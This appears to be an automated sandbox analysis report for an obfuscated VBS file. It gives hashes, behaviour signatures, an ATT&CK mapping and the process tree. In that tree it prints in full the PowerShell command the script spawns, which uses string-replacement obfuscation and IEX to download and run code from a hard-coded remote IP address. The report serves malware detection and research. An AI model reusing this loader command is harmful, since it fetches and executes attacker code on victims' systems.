Overview

overview

10

Static

static

ISSVULHWAC...FW.vbs

windows7_x64

3

ISSVULHWAC...FW.vbs

windows10-2004_x64

10

Analysis

  • max time kernel
    117s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    10-02-2022 18:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ISSVULHWACHLPTGHUNSEZBHITDJCYSVUKKGQHLSCPYQYLHSHFDDDKXHBOOLHYAHOOCFW.vbs

  • Size

    10KB

  • MD5

    d0be9b310cf06899b65ff3db8c6b20a7

  • SHA1

    ce3d7dabd54f6c8c995cde52cf4be2bc30653965

  • SHA256

    030fb292c8fedebe01ff5929c737df216dfde678e14fbf47ac70c7a21f630cb7

  • SHA512

    11b04987b28603549e641907c7a2d2af58303df5628c669bbbb37ec6079767675aabe921e59e67dfea04a629c6afc8b9622dd7e395e261bab7cdb855153f204e

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ISSVULHWACHLPTGHUNSEZBHITDJCYSVUKKGQHLSCPYQYLHSHFDDDKXHBOOLHYAHOOCFW.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:764
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $HUEFUTBTCTLCFKDGFALECUN = '[*+5&/!3<</(%3<$$&<1@#-y*+5&/!3<</(%3<$$&<1@#-t/%&1&+&7=!@8-0(0-+8%$\[/&]9}][1_+@%-&<&#^--%.IO.*+5&/!3<</(%3<$$&<1@#-t)*({3!_=3]@{-+1\}@%{88/%&1&+&7=!@8-0(0-+8%$\4}84}8705\01[/#-(6&19%[/&]9}][1_+@%-&<&#^--%)*({3!_=3]@{-+1\}@%{88/%&1&+&7=!@8-0(0-+8%$\4}84}8705\01[/#-(6&19%d/%&1&+&7=!@8-0(0-+8%$\)*({3!_=3]@{-+1\}@%{88]'.RePlace('*+5&/!3<</(%3<$$&<1@#-','S').RePlace('/%&1&+&7=!@8-0(0-+8%$\','E').RePlace(')*({3!_=3]@{-+1\}@%{88','R').RePlace('4}84}8705\01[/#-(6&19%','A').RePlace('[/&]9}][1_+@%-&<&#^--%','M');$HHPCXNLYCJNJNANYSIXGBXB = ($HUEFUTBTCTLCFKDGFALECUN -Join '')|&('I'+'EX');$HBSWWCHKJPHCIHYLPBADIVC = '[%=}3&3{997<)<9(\/#$9]_y%=}3&3{997<)<9(\/#$9]_#[{9@(%3!%*}#!(]]5)5+%!^%)7)_4&^+#%{370{3-#%m.N!^%)7)_4&^+#%{370{3-#%#[{9@(%3!%*}#!(]]5)5+%.W!^%)7)_4&^+#%{370{3-#%bR!^%)7)_4&^+#%{370{3-#%qu!^%)7)_4&^+#%{370{3-#%%=}3&3{997<)<9(\/#$9]_#[{9@(%3!%*}#!(]]5)5+%]'.RePlace('%=}3&3{997<)<9(\/#$9]_','S').RePlace('!^%)7)_4&^+#%{370{3-#%','E').RePlace('#[{9@(%3!%*}#!(]]5)5+%','T');$HRKBGLQEIIOTGKRAVGDLNFB = ($HBSWWCHKJPHCIHYLPBADIVC -Join '')|&('I'+'EX');$HEKLNIBCXUJQWGFRURKPEYH = '}=5(@3]#3)+286%^()-%7%r\9-9[^\2<62^/3@+]3!){}a^[0__=$7}#(@{][37@^2_&\9-9[^\2<62^/3@+]3!){}'.RePlace('}=5(@3]#3)+286%^()-%7%','C').RePlace('\9-9[^\2<62^/3@+]3!){}','E').RePlace('^[0__=$7}#(@{][37@^2_&','T');$HEBZUFQTNVBUTPKTLSTLJWS = '<=7#5]=_4*+3-]/7}6)-!)\(9%[{[/5=6/[(%9(&%592tR\(9%[{[/5=6/[(%9(&%592++4/41*0$\7@})4_2\{5$/Pon++4/41*0$\7@})4_2\{5$/\(9%[{[/5=6/[(%9(&%592'.RePlace('<=7#5]=_4*+3-]/7}6)-!)','G').RePlace('\(9%[{[/5=6/[(%9(&%592','E').RePlace('++4/41*0$\7@})4_2\{5$/','S');$HHPHRZIHNFHAGPKYQIXDUFE = 'G-^{}6\%&!4)-{0/-92=!)1t1/=&068/-*)_2^(\@_)-}7-^{}6\%&!4)-{0/-92=!)1\{1@=&(406!]](!]+[#[08Pon\{1@=&(406!]](!]+[#[08-^{}6\%&!4)-{0/-92=!)1\{1@=&(406!]](!]+[#[08t1/=&068/-*)_2^(\@_)-}7-^{}6\%&!4)-{0/-92=!)1am'.RePlace('\{1@=&(406!]](!]+[#[08','S').RePlace('-^{}6\%&!4)-{0/-92=!)1','E').RePlace('1/=&068/-*)_2^(\@_)-}7','R');$HXLYDESAYDAKLLLAJUVKBOS = '85{2//*@5<)-^[3_)00#@2449$6@_2+[6{+*=970##$_a101-}+2!%$[72+-&{7+39{To449$6@_2+[6{+*=970##$_n101-}+2!%$[72+-&{7+39{'.RePlace('85{2//*@5<)-^[3_)00#@2','R').RePlace('449$6@_2+[6{+*=970##$_','E').RePlace('101-}+2!%$[72+-&{7+39{','D');&('I'+'EX')($HHPCXNLYCJNJNANYSIXGBXB::new($HRKBGLQEIIOTGKRAVGDLNFB::$HEKLNIBCXUJQWGFRURKPEYH('HttP://54.235.58.2/3/Y7839.txt').$HEBZUFQTNVBUTPKTLSTLJWS().$HHPHRZIHNFHAGPKYQIXDUFE()).$HXLYDESAYDAKLLLAJUVKBOS())
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1796

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/764-54-0x000007FEFB711000-0x000007FEFB713000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1796-56-0x000007FEF2830000-0x000007FEF338D000-memory.dmp
    Filesize

    11.4MB

    Download
  • memory/1796-57-0x000007FEF4F5E000-0x000007FEF4F5F000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1796-58-0x00000000025A0000-0x00000000025A2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1796-60-0x00000000025A4000-0x00000000025A7000-memory.dmp
    Filesize

    12KB

    Download
  • memory/1796-59-0x00000000025A2000-0x00000000025A4000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1796-61-0x00000000025AB000-0x00000000025CA000-memory.dmp
    Filesize

    124KB

    Download